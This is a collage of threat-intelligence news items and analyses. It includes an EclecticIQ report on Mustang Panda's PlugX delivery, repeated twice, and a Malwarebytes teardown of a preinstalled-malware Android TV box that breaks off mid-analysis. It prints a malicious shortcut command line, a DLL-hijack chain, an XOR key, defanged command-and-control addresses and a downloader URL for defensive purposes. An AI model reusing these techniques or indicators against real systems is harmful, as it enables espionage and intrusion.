cw-podcast-020223.jpg

Cisco patches a command injection vulnerability. NIST issues antiphishing guidance. HeadCrab malware’s worldwide distribution campaign. The Gamaredon APT is more interested in collection than destruction. Kathleen Smith of ClearedJobs.Net looks at hiring trends in the cleared community. Bennett from Signifyd describes the fraud ring that’s launched a war on commerce against U.S. merchants. And trends in cyberattacks by state-sponsored actors.

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/22

Selected reading.

Command-Injection Bug in Cisco Industrial Gear Opens Devices to Complete Takeover (Dark Reading)

Phishing Resistance – Protecting the Keys to Your Kingdom (NIST) 

OneNote Documents Increasingly Used to Deliver Malware | Proofpoint UK (Proofpoint)

HeadCrab: A Novel State-of-the-Art Redis Malware in a Global Campaign (Aquasec) 

Another UAC-0010 Story (The State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine)

Russia-backed hacker group Gamaredon attacking Ukraine with info-stealing malware (The Record from Recorded Future News)

City of London traders hit by Russia-linked cyber attack (The Telegraph)

ChristianaCare recovers from cyberattack, restores website service (6abc Philadelphia) 

Nation-State Threats and the Rise of Cyber Mercenaries: Exploring the Microsoft Digital Defense Report (CSO Online)

Microsoft Digital Defense Report 2022 (Microsoft Security)

ransom_g691204760.jpg

shutterstock_malad.png

The campaign illustrates another option for miscreants who had relied on Microsoft macros

Malvertising attacks are being used to distribute virtualized .NET loaders that are highly obfuscated and dropping info-stealer malware.…

Context

Prilex has been active since at least 2014 and evolved from an automated teller machine (ATM) malware into a POS malware in 2016, primarily targeting Brazilian and South American retailers. In 2022, the malware evolved further, conducting fraudulent “GHOST transactions” using EMV cryptograms generated by payment cards during the payment process.

In previous cases, the threat actors behind Prilex used phone-based social engineering techniques for initial access, posing as technical support vendors, then installing Prilex on compromised hosts after being granted access.

Technical Analysis

According to Kaspersky researchers, “Prilex now implements a rule-based file that specifies whether or not to capture credit card information and an option to block NFC-based transactions.” Researchers assess that this capability is intended to force the target to use their physical card into the reader so the malware can capture payment data.

Kaspersky did not provide public indicators of compromise (IOCs) for the newly discovered versions.

Community Impact

In May 2021 and February 2022, unspecified US retailers reported the Prilex malware targeting their systems. The expansion of the malware into the US indicates that over time, Prilex could potentially become a more prevalent threat to POS-operating organizations with operations in the US.

 

tr-cybersecurity-threats-2023-111722.jpe

A new version of the Prilex POS malware has found a novel way to steal your credit card information.

The post Prilex POS malware evolves to block contactless transactions appeared first on TechRepublic.

is1159.jpg

Since September 2021, about a thousand Redis servers have been infected by new stealthy malware meant to hunt down unprotected Redis servers online and create a botnet that mines for the Monero cryptocurrency. The malware, nicknamed HeadCrab by Aqua Security experts Nitzan Yaakov and Asaf Eitani, has so far infected at least 1,200 of these servers, which […]

EIQ_blogimage_malware
EXECUTIVE SUMMARY

Since at least 2019, the Mustang Panda threat actor group has targeted government and public sector organizations across Asia and Europe [3] with long-term cyberespionage campaigns in line with strategic interests of the Chinese government.
In November 2022, Mustang Panda shifted from using archive files to using malicious optical disc image (ISO) files containing a shortcut (LNK) file to deliver the modified version of PlugX malware. This switch increases the evasion against anti-malware solutions [2].
The Mustang Panda APT group loads the PlugX malware in the memory of legitimate software by employing a four-stage infection chain which leverages malicious shortcut (LNK) files, triggering execution via dynamic-link library (DLL) search-order-hijacking.

PLUGX MALWARE EXECUTION FLOW

1Figure 1 – Execution flow of PlugX malware.

First Stage: PlugX Malware Delivered by ISO Image

In the first stage of the infection chain, EclecticIQ researchers assess that the malware was almost certainly delivered by a malicious email with an ISO image attachment. The ISO image contains a shortcut (LNK) file, but it decoyed as a DOC file called “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc”.  

The malicious LNK file contains a command line argument that can be executed by user execution to start the PlugX malware execution chain.

The command line argument of “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc” is shown below:  

 

C:WindowsSystem32cmd.exe /q /c “System Volume Information  test2022.ucp” 

 

 

The test2022.ucp portion of the command line argument is a renamed legitimate software which is originally called LMIGuardianSvc.exe. This executable is abused to perform DLL hijacking and to load the initial PlugX loader called LMIGuardianDll.dll. The legitimate and malicious executables are placed on the same file path (System Volume Information) to perform DLL Hijacking.

2Figure 2 – Command line argument of malicious shortcut (LNK) file.

3Figure 3 -PlugX malware loader execution file path. 

Second Stage: DLL Hijacking Execution Chain to Load PlugX Malware

When a victim clicks on the shortcut file, it executes the command line argument mentioned in first stage, which is a technique called DLL hijacking (after the execution of LMIGuardianSvc.exe, it loads LMIGuardianDll.dll aka PlugX loader automatically). Upon execution of the PlugX loader a Microsoft Office Word document opens. The document is named “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.docx”. This is a decoy document to trick the user into thinking there is no malicious activity.  

One example of the Word document can be seen in the image below:

4Figure 4 – A decoy Word document is used for social engineering. The victim sees a real Word document open after clicking on a shortcut (LNK) file that has a Word document icon.

The process tree below shows the execution of the legitimate application LMIGuardianSvc.exe, which is executed twice under a new directory (AppDataRoamingSamsungDriver) created by the malware and used for persistence access on infected device.  

5Figure 5 – Captured process tree during the execution of malicious shortcut (LNK) file which masquerades as a word document.

Encrypted shellcode named LMIGuardianDat.dat contains PlugX malware:  

6Figure 6 – Encrypted PlugX shellcode in Hex editor.

The PlugX Malware loader decrypts and loads the encrypted shellcode (LMIGuardianDat.dat) inside the LMIGuardianSvc.exe. Injected memory space can be extracted to perform further analysis of decrypted PlugX Malware.

7Figure 7 – Memory map of LMIGuardianSvc.exe.

LMIGuardianDLL.dll (PlugX Loader) decrypts the LMIGuardianDAT.dat and loads it in memory of the legitimate process.

8Figure 8 – Decompiled PlugX loader contains decryption function.

During static analysis, EclecticIQ analysts identified that the PlugX malware loader used a simple XOR algorithm to decrypt the LMIGuardianDAT.dat (XOR encrypted PlugX shellcode) to avoid signature-based detection from antimalware solutions.

9Figure 9 – XOR key is stored statically to perform decryption during execution time of PlugX loader.

PlugX loader used a static XOR key “0x47F”, to decrypt the PlugX shellcode. The below image shows a Python script being used to decrypt the LMIGuardianDAT.dat.

10Figure 10 – Decrypted PlugX shellcode.

Once the PlugX malware has been executed in-memory, the C2 config is decrypted. The C2 IP address 217[.]12[.]206[.]116 and the campaign ID of “test2022” are seen in the figures below:

11

Figure 11 – Decompiled PlugX malware contains campaign ID as a fingerprint of the attack to categorize the victims.

12Figure 12 – Decompiled PlugX malware contains command and control (C2) IP address as static.

Third Stage: Registry Run Key Persistence

Mustang Panda abuses Windows registry run keys to gain persistence on the infected system. On Windows operating systems the run registry keys execute the specified program when a user logs on to the device.  

The PlugX malware created a new run key called as LMIGuardian Update, shown in the image below.

13Figure 13 – Persistence established by malware after writing a new Run key.

Every logon will cause the Windows registry run key to execute the LMIGuardianSvc.exe, triggering the DLL Hijacking that leads to PlugX malware execution.  

14Figure 14 – Written registry key.

The malware creates a new file path which is being used by the persistence mechanism (Run key) to execute the LMIGuardianSvc.exe on this specific file path:

15Figure 15 – New file path created for persistence execution of PlugX malware. 

Fourth Stage: Command and Control Connection

After a successful execution of PlugX malware, it connects to a remote C2 server which is used to send commands to compromised systems via the PlugX malware and to receive exfiltrated data from a target network.  

16Figure 16 – Request headers and server response observed in Mustang Panda’s customized PlugX variant.

Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system. ‘Sec-Dest’ and ‘Sec-Site’ HTTP sections contain encrypted data of victim machine information sent to attackers.

17Figure 17 – Network capture during the TCP request to remote C2 server over port 443.

The C2 IP address 217[.]12[.]206[.]116 was seen hosting another service on port 8088 with a unique SSL certificate that is itself issued to the IP address 45[.]134[.]83[.]29, which is identified as additional Mustang Panda’s infrastructure, according to the BlackBerry Research & Intelligence Team [1].

18Figure 18 – Issued SSL certificate contains another IP address, which was used by Mustang Panda APT group for previous attacks. [1]

Conclusion

EclecticIQ analysts assess it is almost certain the APT group Musta Panda was responsible for this attack. Mustang Panda has leveraged PlugX malware in previous campaigns targeting the Ukraine and has used similar TTPs like DLL hijacking. The group previously used Windows shortcut (LNK) files disguised using double extensions (such as .doc.lnk) with a Microsoft Word icon and has abused registry run keys for persistence. The SSL certificated used in this attack overlaps with previous Mustang Panda activity targeting the Ukraine.

19Figure 19 – Example of LNK Phishing lure used by Mustang Panda APT group in their previous attacks. [2]

EclecticIQ analysts assess it is probable the target for this lure document was a European entity. The phishing lure used in the campaign discusses the effect EU sanctions against Russia will have on the European Union. Mustang Panda has targeted European organizations before in a similar campaign in 2022-10-26 [Figure 19]. Mustang Panda APT group continues to be a highly active threat group conducting cyber operations targeting organizations across Europe [2]. EclecticIQ analysts have identified Mustang Panda operators adding new evasion techniques, like using a custom malware loader to execute encrypted an PlugX sample for the purpose of increasing infection rates and staying under the radar while performing cyber espionage activates against victims.  

EclecticIQ analysts assess that it is probable Mustang Panda will increase their activity and continue to use similar TTPs in response to geopolitical developments in Ukraine and Europe, based on an examination of the group’s previous cyberespionage activity.  Analysts should continue to track Mustang Panda using the TTPs and infrastructure highlighted in the report and the YARA rules provided below.  

Mitigations  

Implement basic incident response and detection deployments and controls like network IDS, netflow collection, host-logging, and web proxy, alongside human monitoring of detection sources.
Employ host-based controls.
Filter email correspondence and monitor for malicious attachments.
Identify critical data and implement additional network segmentation and special protections for sensitive information, such as multifactor authentication, highly restricted access, and storage systems only accessible via an internal network.
Create alerts for disk image file types, such as ISO, and shortcut files, which have been increasingly abused by different threat actors. Furthermore, organizations should consider disabling auto-mounting of ISO or VHD files.
Configure intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on and upon review, consider blocking connection attempts from unrecognized external IP addresses and domains. 

MITRE ATT&CK

Tactic: Technique 

ATT&CK Code 

Execution: User Execution Malicious File 

T1204 

Defense Evasion: Hijack Execution Flow DLL Search Order Hijacking 

T1574.001 

Defense Evasion: Deobfuscate/Decode Files or Information 

T1140 

Defense Evasion: Masquerading Double File Extension 

T1036.007 

Command-and-Control: Encrypted Channel Symmetric Cryptography 

T1573.001 

Command-and-Control: Data Encoding Standard Encoding 

T1132.001 

Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 

T1547.001 

 

INDICATORS OF COMPROMISE

Sample File Name(s) 

SHA-256 Hash 

LMIGuardianDll.dll 

ee2c8909089f53aafc421d9853c01856b0a9015eba12aa0382e98417d28aef3f 

LMIGuardianDat.dat 

8c4926dd32204b6a666b274a78ccfb16fe84bbd7d6bc218a5310970c4c5d9450 

draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.iso 

723d804cfc334cad788f86c39c7fb58b42f452a72191f7f39400cf05d980b4f3 

draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc.lnk 

2c0273394cda1b07680913edd70d3438a098bb4468f16eebf2f50d060cdf4e96 

LMIGuardianSvc.exe renamed (test2022.ucp) 

26c855264896db95ed46e502f2d318e5f2ad25b59bdc47bd7ffe92646102ae0d 

 

Command and Control Servers 

217[.]12[.]206[.]116  

45[.]134[.]83[.]29  

Hunting Resources: Live Queries & Yara Rules

 

About EclecticIQ Intelligence & Research Team

EclecticIQ is a global provider of threat intelligence, hunting, and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence & Research Team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.

We would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com.

You might also be interested in:

QakBot Malware Used Unpatched Vulnerability to Bypass Windows OS Security Feature

ChatGPT Makes Waves Inside and Outside of the Tech Industry

The Godfather Banking Trojan Expands Application Targeting to Affect More Europe-Based Victims

Appendix

https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets
https://www.recordedfuture.com/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant
https://twitter.com/ESETresearch/status/1400165767488970764   

The post Mustang Panda APT Group Uses European Commission-Themed Lure to Deliver PlugX Malware appeared first on Security Boulevard.

EIQ_blogimage_malware
EXECUTIVE SUMMARY

Since at least 2019, the Mustang Panda threat actor group has targeted government and public sector organizations across Asia and Europe [3] with long-term cyberespionage campaigns in line with strategic interests of the Chinese government.
In November 2022, Mustang Panda shifted from using archive files to using malicious optical disc image (ISO) files containing a shortcut (LNK) file to deliver the modified version of PlugX malware. This switch increases the evasion against anti-malware solutions [2].
The Mustang Panda APT group loads the PlugX malware in the memory of legitimate software by employing a four-stage infection chain which leverages malicious shortcut (LNK) files, triggering execution via dynamic-link library (DLL) search-order-hijacking.

PLUGX MALWARE EXECUTION FLOW

1Figure 1 – Execution flow of PlugX malware.

First Stage: PlugX Malware Delivered by ISO Image

In the first stage of the infection chain, EclecticIQ researchers assess that the malware was almost certainly delivered by a malicious email with an ISO image attachment. The ISO image contains a shortcut (LNK) file, but it decoyed as a DOC file called “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc”.  

The malicious LNK file contains a command line argument that can be executed by user execution to start the PlugX malware execution chain.

The command line argument of “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc” is shown below:  

 

C:WindowsSystem32cmd.exe /q /c “System Volume Information  test2022.ucp” 

 

 

The test2022.ucp portion of the command line argument is a renamed legitimate software which is originally called LMIGuardianSvc.exe. This executable is abused to perform DLL hijacking and to load the initial PlugX loader called LMIGuardianDll.dll. The legitimate and malicious executables are placed on the same file path (System Volume Information) to perform DLL Hijacking.

2Figure 2 – Command line argument of malicious shortcut (LNK) file.

3Figure 3 -PlugX malware loader execution file path. 

Second Stage: DLL Hijacking Execution Chain to Load PlugX Malware

When a victim clicks on the shortcut file, it executes the command line argument mentioned in first stage, which is a technique called DLL hijacking (after the execution of LMIGuardianSvc.exe, it loads LMIGuardianDll.dll aka PlugX loader automatically). Upon execution of the PlugX loader a Microsoft Office Word document opens. The document is named “draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.docx”. This is a decoy document to trick the user into thinking there is no malicious activity.  

One example of the Word document can be seen in the image below:

4Figure 4 – A decoy Word document is used for social engineering. The victim sees a real Word document open after clicking on a shortcut (LNK) file that has a Word document icon.

The process tree below shows the execution of the legitimate application LMIGuardianSvc.exe, which is executed twice under a new directory (AppDataRoamingSamsungDriver) created by the malware and used for persistence access on infected device.  

5Figure 5 – Captured process tree during the execution of malicious shortcut (LNK) file which masquerades as a word document.

Encrypted shellcode named LMIGuardianDat.dat contains PlugX malware:  

6Figure 6 – Encrypted PlugX shellcode in Hex editor.

The PlugX Malware loader decrypts and loads the encrypted shellcode (LMIGuardianDat.dat) inside the LMIGuardianSvc.exe. Injected memory space can be extracted to perform further analysis of decrypted PlugX Malware.

7Figure 7 – Memory map of LMIGuardianSvc.exe.

LMIGuardianDLL.dll (PlugX Loader) decrypts the LMIGuardianDAT.dat and loads it in memory of the legitimate process.

8Figure 8 – Decompiled PlugX loader contains decryption function.

During static analysis, EclecticIQ analysts identified that the PlugX malware loader used a simple XOR algorithm to decrypt the LMIGuardianDAT.dat (XOR encrypted PlugX shellcode) to avoid signature-based detection from antimalware solutions.

9Figure 9 – XOR key is stored statically to perform decryption during execution time of PlugX loader.

PlugX loader used a static XOR key “0x47F”, to decrypt the PlugX shellcode. The below image shows a Python script being used to decrypt the LMIGuardianDAT.dat.

10Figure 10 – Decrypted PlugX shellcode.

Once the PlugX malware has been executed in-memory, the C2 config is decrypted. The C2 IP address 217[.]12[.]206[.]116 and the campaign ID of “test2022” are seen in the figures below:

11

Figure 11 – Decompiled PlugX malware contains campaign ID as a fingerprint of the attack to categorize the victims.

12Figure 12 – Decompiled PlugX malware contains command and control (C2) IP address as static.

Third Stage: Registry Run Key Persistence

Mustang Panda abuses Windows registry run keys to gain persistence on the infected system. On Windows operating systems the run registry keys execute the specified program when a user logs on to the device.  

The PlugX malware created a new run key called as LMIGuardian Update, shown in the image below.

13Figure 13 – Persistence established by malware after writing a new Run key.

Every logon will cause the Windows registry run key to execute the LMIGuardianSvc.exe, triggering the DLL Hijacking that leads to PlugX malware execution.  

14Figure 14 – Written registry key.

The malware creates a new file path which is being used by the persistence mechanism (Run key) to execute the LMIGuardianSvc.exe on this specific file path:

15Figure 15 – New file path created for persistence execution of PlugX malware. 

Fourth Stage: Command and Control Connection

After a successful execution of PlugX malware, it connects to a remote C2 server which is used to send commands to compromised systems via the PlugX malware and to receive exfiltrated data from a target network.  

16Figure 16 – Request headers and server response observed in Mustang Panda’s customized PlugX variant.

Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system. ‘Sec-Dest’ and ‘Sec-Site’ HTTP sections contain encrypted data of victim machine information sent to attackers.

17Figure 17 – Network capture during the TCP request to remote C2 server over port 443.

The C2 IP address 217[.]12[.]206[.]116 was seen hosting another service on port 8088 with a unique SSL certificate that is itself issued to the IP address 45[.]134[.]83[.]29, which is identified as additional Mustang Panda’s infrastructure, according to the BlackBerry Research & Intelligence Team [1].

18Figure 18 – Issued SSL certificate contains another IP address, which was used by Mustang Panda APT group for previous attacks. [1]

Conclusion

EclecticIQ analysts assess it is almost certain the APT group Musta Panda was responsible for this attack. Mustang Panda has leveraged PlugX malware in previous campaigns targeting the Ukraine and has used similar TTPs like DLL hijacking. The group previously used Windows shortcut (LNK) files disguised using double extensions (such as .doc.lnk) with a Microsoft Word icon and has abused registry run keys for persistence. The SSL certificated used in this attack overlaps with previous Mustang Panda activity targeting the Ukraine.

19Figure 19 – Example of LNK Phishing lure used by Mustang Panda APT group in their previous attacks. [2]

EclecticIQ analysts assess it is probable the target for this lure document was a European entity. The phishing lure used in the campaign discusses the effect EU sanctions against Russia will have on the European Union. Mustang Panda has targeted European organizations before in a similar campaign in 2022-10-26 [Figure 19]. Mustang Panda APT group continues to be a highly active threat group conducting cyber operations targeting organizations across Europe [2]. EclecticIQ analysts have identified Mustang Panda operators adding new evasion techniques, like using a custom malware loader to execute encrypted an PlugX sample for the purpose of increasing infection rates and staying under the radar while performing cyber espionage activates against victims.  

EclecticIQ analysts assess that it is probable Mustang Panda will increase their activity and continue to use similar TTPs in response to geopolitical developments in Ukraine and Europe, based on an examination of the group’s previous cyberespionage activity.  Analysts should continue to track Mustang Panda using the TTPs and infrastructure highlighted in the report and the YARA rules provided below.  

Mitigations  

Implement basic incident response and detection deployments and controls like network IDS, netflow collection, host-logging, and web proxy, alongside human monitoring of detection sources.
Employ host-based controls.
Filter email correspondence and monitor for malicious attachments.
Identify critical data and implement additional network segmentation and special protections for sensitive information, such as multifactor authentication, highly restricted access, and storage systems only accessible via an internal network.
Create alerts for disk image file types, such as ISO, and shortcut files, which have been increasingly abused by different threat actors. Furthermore, organizations should consider disabling auto-mounting of ISO or VHD files.
Configure intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on and upon review, consider blocking connection attempts from unrecognized external IP addresses and domains. 

MITRE ATT&CK

Tactic: Technique 

ATT&CK Code 

Execution: User Execution Malicious File 

T1204 

Defense Evasion: Hijack Execution Flow DLL Search Order Hijacking 

T1574.001 

Defense Evasion: Deobfuscate/Decode Files or Information 

T1140 

Defense Evasion: Masquerading Double File Extension 

T1036.007 

Command-and-Control: Encrypted Channel Symmetric Cryptography 

T1573.001 

Command-and-Control: Data Encoding Standard Encoding 

T1132.001 

Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 

T1547.001 

 

INDICATORS OF COMPROMISE

Sample File Name(s) 

SHA-256 Hash 

LMIGuardianDll.dll 

ee2c8909089f53aafc421d9853c01856b0a9015eba12aa0382e98417d28aef3f 

LMIGuardianDat.dat 

8c4926dd32204b6a666b274a78ccfb16fe84bbd7d6bc218a5310970c4c5d9450 

draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.iso 

723d804cfc334cad788f86c39c7fb58b42f452a72191f7f39400cf05d980b4f3 

draft letter to European Commission RUSSIAN OIL PRICE CAP sg de.doc.lnk 

2c0273394cda1b07680913edd70d3438a098bb4468f16eebf2f50d060cdf4e96 

LMIGuardianSvc.exe renamed (test2022.ucp) 

26c855264896db95ed46e502f2d318e5f2ad25b59bdc47bd7ffe92646102ae0d 

 

Command and Control Servers 

217[.]12[.]206[.]116  

45[.]134[.]83[.]29  

Hunting Resources: Live Queries & Yara Rules

 

About EclecticIQ Intelligence & Research Team

EclecticIQ is a global provider of threat intelligence, hunting, and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence & Research Team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.

We would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com.

You might also be interested in:

QakBot Malware Used Unpatched Vulnerability to Bypass Windows OS Security Feature

ChatGPT Makes Waves Inside and Outside of the Tech Industry

The Godfather Banking Trojan Expands Application Targeting to Affect More Europe-Based Victims

Appendix

https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets
https://www.recordedfuture.com/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant
https://twitter.com/ESETresearch/status/1400165767488970764   

At least 1,200 Redis database servers worldwide have been corralled into a botnet using an “elusive and severe threat” dubbed HeadCrab since early September 2021.
“This advanced threat actor utilizes a state-of-the-art, custom-made malware that is undetectable by agentless and traditional anti-virus solutions to compromise a large number of Redis servers,” Aqua security researcher Asaf Eitani 

COVER-new-apt34-backdoor-malware-targets

We analyze an infection campaign targeting organizations in the Middle East for cyberespionage in December 2022 using a new backdoor malware. The campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers.

Detect Malware in Container Images

As organizations continue to adopt containers and Kubernetes for their applications, the need to secure these containers becomes increasingly important. Many applications are built with third-party sourced components from public image registries. Attackers are privy to the growing use of these third-party image registries, and often target them with malware, thus requiring special attention. At VMware, we define malware as the broad category name for harmful code used in cyberattacks that affect laptops, desktops, servers, mobile devices, and, more recently, IoT devices. Some of the most common examples of malware include

Viruses
Bots
Ransomware

When using malware, attackers typically have a set target and goal in mind and use malware as a mechanism to gain access and/or information.

As malware continues to pose a huge risk when developing new modern applications, organizations must scan these images for these specific types of attacks from build to run to ensure the security and integrity of their application.

Malware Scanning with VMware Carbon Black Container

With VMware Carbon Black Container, customers can now scan all executable files in their containerized applications to detect malicious files and malware. Just like vulnerabilities and Kubernetes workload

posture, users can now scan images for malware at runtime and in the build phase through CI/CD integration.

Users can now:

Detect suspicious files in all containerized applications
Alert or block containers and workloads with suspicious files during CI/CD pipeline
Use the image scan log to review all scan activities, including file reputation scan information for all scan types
Deny workload and images affected by malware through a policy
Manage a list of customer-provided hash of known malware to utilize CBC enforcement capabilities
Explore deeper into detected malware and allows them to make the decision on whether or not they want to exclude it

Increased Visibility

Figure 1: Updated Widgets on the Image Scanning Dashboard

With the updated image scanning dashboard, users can analyze and detect all relevant files in a given container for the first time. This newly added malware widget enables users to quickly identify suspicious files alongside critical vulnerabilities so they can be remediated as quickly as possible. This valuable and actionable data can be viewed across teams in the VMware Carbon Black dashboard, helping to increase visibility and reduce friction.

Figure 2: New Suspicious Files Tab with Identified Malware

The new malware scanning capabilities allow users to easily identify the origin of the file by identifying the layer and even the command(s) that contain malware for easy resolution.

As we know, it is important to catch suspicious activity as soon as possible to remediate and reduce risk. Users are now able to use the cbctl to scan containers during the build phase to detect containers with suspected or banded files and to block risky containers early in the SDLC.

Additional Resources For more information, check out our technical release notes and the VMware Carbon Black Container page.

The post Malware Detection in Container Images appeared first on VMware Security Blog.

tr-new-chaos-malware.jpeg

A new phishing campaign abuses OneNote documents to infect computers with the infamous AsyncRAT malware, targeting users in the U.K., Canada and the U.S.

The post OneNote documents spread malware in several countries appeared first on TechRepublic.

HeadCrab Attacks Servers Worldwide with a Novel State-of-the-Art Redis Malware

Aqua Nautilus researchers discovered a new elusive and severe threat that has been infiltrating and residing on servers worldwide since early September 2021. Known as HeadCrab, this advanced threat actor utilizes a state-of-the-art, custom-made malware that is undetectable by agentless and traditional anti-virus solutions to compromise a large number of Redis servers. The HeadCrab botnet has taken control of at least 1,200 servers. 

CRYPTO-HERO.jpg

FortiGuard Labs analyzes malicious code found in captured excel documents that cryptojacks a victim’s system to mine for Monero cryptocurrency. See how the malicious software is delivered, executed, and the techniques it uses to gain persistence on a device.

63d86e130401aa74899e9540_Figure%201.png

This blog post highlights the recent malvertising campaigns targeting Google searches that deploy info-stealer malware. It covers the attackers’ techniques and provides a list of indicators of compromise. Recommendations for the general public are also included to help mitigate the risk of falling victim to such attacks.

With Malware Protection, you can scan once at the edge and prevent malware from draining your time and budget.

Trusselsaktører har fundet en ’workaround’ til distrubution af malware, efter at Microsoft har deaktiveret makroer som standard i e-mails. Det sker via notesbogen OneNote, der ganske vist ikke understøtter makroer, men i stedet kan en bruger indsætte vedhæftede filer i en notesbog. Når der dobbeltklikkes på filen, vil den vedhæftede fil starte – i disse tilfælde er der tale om ondsindede VBS-vedhæftede filer – der automatisk starter scriptet, når der dobbeltklikkes. Dermed kan der downloades malware fra et eksternt websted.

Sprog
Dansk

Keywords: OnenoteLæs mere om Sådan foregår distribution af malware via OneNote

Trusselsaktører er begyndt at bruge OneNote-vedhæftede filer i phishing-e-mails, der kan inficere med malware. En malware, der vel at mærke kan give fjernadgang, og som kan bruges til at installere mere malware, stjæle adgangskoder eller kryptowallets.

Det skriver Bleeping Computer.

Sprog
Dansk

Keywords: OnenoteLæs mere om Bruger Microsoft OneNote til spredning af malware

A couple of weeks ago, security news outlets made their rounds reporting on an Android TV box available on Amazon that came pre-installed with malware. The findings came from a Canadian developer, Daniel Milisic, who posted on his GitHub. What Daniel found was an Android T95 TV box infected with malware right out of the box!

Immediately, I recognized some of the apps that put up red flags, such as Adups. Under those circumstances, there’s only one logical thing a curious mobile malware researcher can do—I put in an IT Helpdesk request to buy a malware infested TV box! (For the record, I do not recommend putting in such a request at a non-information security company.)

The following is my analysis after days of obsessing over this little black box.

Toolset

Before we continue with my analysis, let me explain some of the tools I used so when they are referenced it makes more sense. This is for the average reader who is not a tech nerd like myself. If you are technically inclined and want to skip to the good stuff, head down to header Getting to the Core(java) of the case.

Android Debug Bridge (adb)—I have referenced this command line tool many times in the past. It is your best friend into easily sending commands to an Android device via Windows, Mac, or Linux environments. It’s part of Android Studio, but unless you plan to develop an Android app, I recommend just grabbing the Android SDK Platform Tools. I have a great writeup on the Malwarebytes Forum on how to install adb and use it to remediate preinstalled malware.
Telerik Fiddler Classic—Fiddler is an Internet traffic monitor with powerful HTTPS capturing capabilities. Most other internet traffic monitors can’t show details of HTTPS connections, because it is encrypted.  The powers of Fiddler can capture that traffic by installing a special certificate onto the device. Then by proxying internet traffic through a Windows machine, you can see otherwise private HTTPS traffic. The best part is it doesn’t require root access. That is unless you have a stubborn TV Box with no place in Settings to install certificates. Although more painful, there is a workaround to install with root access.
NoRoot Firewall—This handy app allows or denies network traffic based on each individual app. More importantly, it also logs the traffic from each app, giving you a good baseline of what to look for in Internet traffic monitors. Although noisy at first, becasue you have to initially allow or deny every app that connects to the Internet, it’s worth it if your goal is to stop unwanted Internet traffic from particular apps in their tracks.
Logcat —Good old Logcat! Another tool referenced quite often. This command line tool outputs logs of just about everything going on with an Android device.

Rooted in evil 

The first sign that something was not right with this TV box was the fact that it has a toggle switch for root access. (Hint: If you buy a TV box from Amazon Prime and it has a “Root switch” toggle, use the Prime free return policy right away.)

ROOT toggle

Whether the toggle switch is on or off, I am pretty sure it doesn’t matter because the box is rooted regardless.

To clarify, rooting in the context of Android devices means attaining the highest level of access—known as “root”. Among other things, this gives you the ability to modify system level directories and files, something regular Android users can’t do. This heightened access is made available mainly for developers who need access to test in a pre-production environment.

Once in production, Android devices are not rooted. In fact, if you run the command adb root on a production Android device, you get an error message stating adbd cannot run as root in production builds. On a rooted device, the message is restarting adbd as root or adbd is already running as root.

Important Warning: Rooting an Android device that is in production and thus does not have root access is very dangerous and can result in bricking the device, leaving it forever broken. In addition, allowing root access gives every app on the phone root access, including malware! We highly recommend you do not root your Android device. However, since the T95 TV box was already rooted, I used root for analysis and remediation.

Shell games

Another thing I should mention before moving on is a word about shell. Shell refers to interacting with the Linux command line. Since all Android devices are based on Linux, you can access the shell to run common Linux commands, along with other Android-specific commands installed on the device.

You can do this via the adb command shell. For example, if you want to list all packages on an Android device, you could run pm list packages -f on the shell. You can do this in two ways. More commonly, you might tunnel the command using adb shell pm list packages -f. Or you can first go to the shell by using command adb shell, and then run pm list packages -f.

In this instance, the name of the shell on the T95 TV Box is walleye. The name of the shell changes based on the Android device’s manufacturer and model. Note that this is another oddity with the T95 TV Box. As a matter of fact, the shell name walleye is stolen from a Pixel 2 with the same name. (This information comes in handy later on.)

Okay, know that we went through the tedious details, lets get to the good stuff!

Getting to the Core(java) of the case

Daniel references in his GitHub the existence of a directory /data/system/Corejava. Testing with other Android devices I have sitting around confirms this directory should not exist—Including on a Pixel 2 (the box has the same shell name as a Pixel 2: Walleye).

If /data/system/Corejava was a common directory, surely the Pixel 2 with the same shell name as the T95 TV box would have this directory? Daniel also provides the contents of /data/system/Corejava from his T95 TV box. Within it contains an infected classes.dex file. Looking at my own T95 TV box, it in fact contains the same malicious directories and files:

Corejava_folder

The classes.dex is a DEX file that contains the machine code for an app to run. Every app, which is called an Android Package Kit (APK) on Android, contains a classes.dex file, along with other directories and files required for the classes.dex to load and run.

Therefore, there must be an APK installed for this classes.dex to work.

My next step was to analyze this malicious DEX file found in Corejava, or Corejava classes.dex—I will call it Corejava classes.dex for clarity.

Corejava classes.dex’s code contained a lot of references to using internet traffic: GET commands, POST commands, HTTP, HTTPS, etc. Looking at the VirusTotal results of the Corejava classes.dex found in my own T95 TV box aligned with it being a Trojan Downloader. The clearest evidence of this were URLs in the code. One of them was a malicious URL associated with other malicious DEX files and APKs:

hxxps://dy.kr.wildpettykiwi.info/dykr/update

With this evidence, I moved on to collecting network traffic.

Exploring the network traffic

